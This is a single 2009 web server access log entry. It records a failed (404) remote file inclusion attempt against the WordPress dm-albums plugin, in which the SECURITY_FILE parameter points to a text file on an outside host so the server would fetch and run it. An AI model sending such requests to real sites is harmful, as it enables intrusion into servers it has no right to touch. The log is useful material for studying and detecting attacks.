89.223.3.98 - - [12/Jul/2009:01:02:20 -0400] "GET /logs/error_log.Q109070600//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.petechnologies.net///id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
